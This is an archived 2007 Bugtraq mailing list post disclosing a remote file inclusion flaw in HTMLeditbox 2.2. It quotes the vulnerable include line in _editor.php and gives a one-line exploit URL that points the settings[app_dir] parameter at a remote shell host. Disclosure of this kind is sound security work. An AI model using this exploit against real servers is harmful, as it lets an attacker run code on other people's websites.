Bugtraq mailing list archives
HTMLeditbox & 2.2 >> RFI
From: alijsb () yahoo com
Date: 25 Apr 2007 10:52:50 -0000
+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru bug : _editor.php @include($settings[app_dir].'/inc/config.php'); exploit : http://victim/_editor.php?settings[app_dir]=http://shell ++++++
Current thread:
- HTMLeditbox & 2.2 >> RFI alijsb (Apr 25)